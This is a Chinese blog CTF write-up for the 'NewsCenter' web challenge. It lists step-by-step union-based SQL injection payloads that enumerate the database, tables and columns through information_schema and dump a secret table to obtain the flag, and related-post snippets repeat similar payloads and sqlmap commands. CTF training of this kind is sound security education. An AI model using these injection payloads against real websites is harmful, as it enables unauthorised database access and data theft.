攻防世界-web NewsCenter3

已于 2022-02-11 10:17:35 修改
阅读量1k 收藏 1
点赞数 1
分类专栏: CTF 文章标签: 前端 安全 web安全 mysql sql
于 2022-02-11 10:15:37 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_48108919/article/details/122874200
版权

题目描述:如题目环境报错,稍等片刻刷新即可

一、测试

输入:1' 页面直接500

输入:1' or 1 =1 # 页面正常显示

使用:1' order by n # 测试地段数为3

使用联合查询爆数据:-1' union select 1,2,3 #

可以看到2,3位回显,可以通过这两个位置来查询内容

二、查看当前数据库名及数据库用户名

-1' union select 1,database(),user() # 

 三、查看表名:

-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() #

四、查看secret_table的字段(根据表名猜测flag应该在这个表里面):

-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='secret_table' #

五、 查看字段的内容

-1' union select 1,2,group_concat(id,fl4g) from news.secret_table #

六、flag:1是id列的值,把1去掉就是flag 

QCTF{sq1_inJec7ion_ezzz}

码啊码
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
攻防世界(高手进阶区)——NewsCenter
知足且坚定,温柔且上进
02-11 2137
御剑扫一下,发现有robots.txt与config.php,不过是个空白页面;放弃。 用burpsuite抓包,: 尝试xff,无果,直接sql注入,利用sqlmap. 将Request中的Raw内容拷贝到一个txt文档,用sqlmap爆。(注意将文档拷贝到sqlmap文件所在位置) sqlmap.py -r flag.txt --dbs 发现两个包,分别尝试,只有news有: sqlm...
攻防世界-NewsCenter详解
Mr_helloword的博客
08-11 5359
NewsCenter 进入后我们发现有一个搜索框进行新闻搜索我们尝试有无sql注入 我们输入1’ and 1=1 #判断有无sql注入发现有 查看列数1’ order by 3 # 联合查询 1’ union select 1,2,3 # 查表: 1’ union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() # 查字段: 1’ union
NewsCenter
he_stand的博客
03-16 223
WriteUp 1.题目名称 NewsCenter 2.难度系数 1.0 3.题目来源 XCTF 4th-QCTF-2018 4.题目描述 5.解题步骤 5.1 打开网址 得到一个搜索框,猜测可能是SQL注入。输入任意,无回显。首先先判断有几列。输入 1’ union select 1 # 时,页面出现错误,继续尝试,当输入1’ union select 1,1,1#时,页面正常,说明有三列数据 ...
攻防世界NewsCenter
金 帛的博客
04-09 2346
攻防世界WP
攻防世界---NewsCenter
weixin_43803070的博客
07-15 490
废话不多说,直接上思路。 ** 手工注入: ** 1' //报错, 判断字段: 1' order by 3# //最终我们得到是三个字段,在这里们用--+代替#,竟然报错。 回显字段: -1' union select 1,2,3# 爆出数据库(两种方法): -1' union select 1,2,database()# -1' union select 1,2,group_conc...
Python库 | newscenter-1.6.3.tar.gz
05-19
资源分类:Python库 所属语言:Python 资源全名:newscenter-1.6.3.tar.gz 资源来源:官方 安装方法:https://lanzao.blog.csdn.net/article/details/101784059
Python库 | newscenter-2.0.23.tar.gz
04-12
资源分类:Python库 所属语言:Python 资源全名:newscenter-2.0.23.tar.gz 资源来源:官方 安装方法:https://lanzao.blog.csdn.net/article/details/101784059
PyPI 官网下载 | newscenter-2.0.4.tar.gz
01-14
《PyPI官网下载 | newscenter-2.0.4.tar.gz——深入了解Python库的发布与使用》 在Python的世界里,PyPI(Python Package Index)是最重要的资源库,它为全球的开发者提供了一个集中地,可以发布、分享并下载Python...
newscenter_app
02-20
使用异步Web抓取脚本,每3小时更新一次新闻报道。特征从顶级主流媒体网站的首页显示15个热门新闻头条。 单击每个标题将使用户链接到实际文章。未来的改进添加其他新闻站点以进行更多样化的比较添加下拉菜单,允许...
Web安全(NewsCenter)
m0_56010012的博客
02-28 479
如题目环境报错,稍等片刻刷新即可
XCTF攻防世界 Web高手进阶区 第一部分 writeup
Senimo
03-29 3716
XCTF攻防世界 Web高手进阶区 第一部分 writeupbaby_webTraining-WWW-Robotsphp_rceWeb_php_includewarmupNewsCenter baby_web 难度系数:1.0 题目来源: 暂无 题目描述:想想初始页面是哪个 启动场景: http://111.198.29.45:45285/1.php 可以看到进入的页面是1.php,提示为初始...
进阶-web038-upload
boom_99的博客
10-02 205
title: upload data: 2020-09-25 22:49:54 Reprint from:无名之涟 题目描述: 如题目环境有问题,稍等片刻后刷新即可 解题思路: 转载自CSDN-无名之涟,鞠躬感谢(真的不会写,太菜了) 一开始是一个注册登录的界面,后来想了想,这个操作可能就是告诉我们有个数据库,提示我们和sql注入有关 上传了好多种拓展名,只能用jpg,且传完之后只回显了文件名,没有路径之类的提示,说明文件名被保存到了数据库(猜测这里也是一个小小的提示) 接下来都是大佬的操作了 用b.
攻防世界WEB高手进阶区第二周
borrrrring的博客
07-17 398
Web_php_unsrialize [题目描述]暂无 [题目场景] 先对代码进行分析 从代码中可以看出需要得到var参数,并且参数的值需要满足三个条件 1.满足base64加密;2绕过wakeup函数;3绕过preg_match的正则表达式 根据提示 首先序列化fl4g.php 假设$Y=new Demo(‘fl4g.php’); 得到 O:4:“Demo”:1:{s:10:“Demofile”;s:8:“fl4g.php”;} 而正则匹配的规则是: 在不区分大小写的情况下,若字符串出
20210108攻防世界WEB高手区题目一题多解全教程通关(7-12)
qq_45290991的博客
01-08 417
目录 007ics-06 008warmup warmup第一种解法 warmup第二种解法 009NewsCenter 010NaNNaNNaNNaN-Batman 011web2 012PHP2 007ics-06 题目描述:云平台报表中心收集了设备管理基础服务的数据,但是数据被删除了,只有一处留下了入侵者的痕迹。 只有一处可以点击那就是“报表中心",发现id是注入点,用BP爆破之,发现最可能是id=2333,得到flag:cyberpeace{3521d1fba8ef203.
攻防世界web解题[进阶](三)
weixin_46703850的博客
03-06 437
攻防世界web解题[进阶](三))
CTF_Web:攻防世界高手区进阶题WP(5-8)
AFCC_的博客(Web_Dog)
08-07 1081
持续更新ing 0x05 ics-06 **题目描述:**云平台报表中心收集了设备管理基础服务的数据,但是数据被删除了,只有一处留下了入侵者的痕迹。 打开题目发现只有报表管理可以点, 答案就应该在这里面,但查询也是假的,url中存在参数id,但没有注入,不管怎么输入都不会报错,换几个id号试试,发现都有返回,联系题目被藏在了某一处,爆破id号。 使用burp抓包进行id测试,生成1-10000的id号。 在id=2333中返回不同,且响应号为200。 找到flag。 0x06 warmup **题目描述
【原创】Wiki报错:“该文件的加载时间比平时要长。请稍等片刻……”
Young的博客
08-03 4036
问题: 今天接到消息说是,wiki文档无法编辑文档,提示:“该文件的加载时间比平时要长。请稍等片刻,然后尝试刷新。问题依然存在?请联系Confluence管理员”。尝试了一下,发现所有的文档都不能编辑。此时,运维的同事说,此服务器的内存使用量过高。 解决问题: 初步判断是因为内存过高,导致的服务不可用,联系运维计划半个小时后升级服务器配置,同时咨询一个管理过Confluence的朋友,等...
Web解进阶题目思路(7~12)
xiao_xiao_lan的博客
08-03 221
七、NewsCenter(难度:2) 提示 如题目环境报错,稍等片刻刷新即可。 纯被骗,进来一直刷新都是这个界面。
攻防世界 newscenter
最新发布
09-08
攻防世界NewsCenter是一个基于...这是一个CTF比赛中的一个关卡,攻防世界NewsCenter也是为了帮助新手了解和学习Web安全而创建的。<span class="em">1</span><span class="em">2</span><span class="em">3</span>

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

码啊码

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值